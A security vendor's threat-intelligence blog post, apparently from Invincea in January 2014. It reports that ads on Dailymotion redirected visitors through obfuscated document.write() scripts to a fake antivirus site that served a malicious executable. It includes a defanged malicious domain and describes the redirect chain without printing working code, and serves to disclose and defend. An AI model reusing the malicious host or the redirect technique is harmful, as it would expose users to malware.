Sophos acquires machine learning visionary Invincea. redirects to Fake AV Threat

Jan 7, 2014


Today we noticed that browsing to hxxp://www[.]dailymotion[.]com yields a Fake A/V threat as seen in the brief video below. Details of the malware have been provided below. The payload has a current detection ratio of 10/47.

As of the time of this blog (1:30 EST 1/7/14) the payload was still being served to our knowledge. We have been in contact with the web property and disclosed this information. We will provide updates/further analysis as we have it available.

The threat compels the target to download a malicious .exe as a ruse to “clean” their “infected” machine…traditional Fake A/V attack. Noteworthy is the fact that the web property is ranked around 90th in the world with more than 17m monthly viewers and that this payload is served through 3rd party ad network similar to what was witnessed a few days ago with Yahoo!

Dailymotion fake av

The redirect is to hxxp://853e4f39[.]webantivirusprorh[.]pl/ ( as seen in the Invincea forensic data captured from running the malware in the virtual container: fake av

A javascript based redirect is loaded via and seen here.  You can see the obfuscated script tag on the first line which gets written to the page via a document.write():

Fake AV

This following script loaded from does another document.write() to the .pl site hosting the FakeAV binary as seen here:

Fake av dailymotion

Contents of the index page hosted on 853e4f39[.]webantivirusprorh[.]pl

Fake dailymotion anitvirus

Upon successful installation, the system is rebooted and the victim is presented with the following image showing an active “scan” of their system:

Fake dailymotion anitvirus-1

You may also be interested in...

Ransomware’s Stronghold on Healthcare

read more

X by Invincea: HIPAA and HITRUST Compliance

read more

5 Questions to Ask About Machine Learning

read more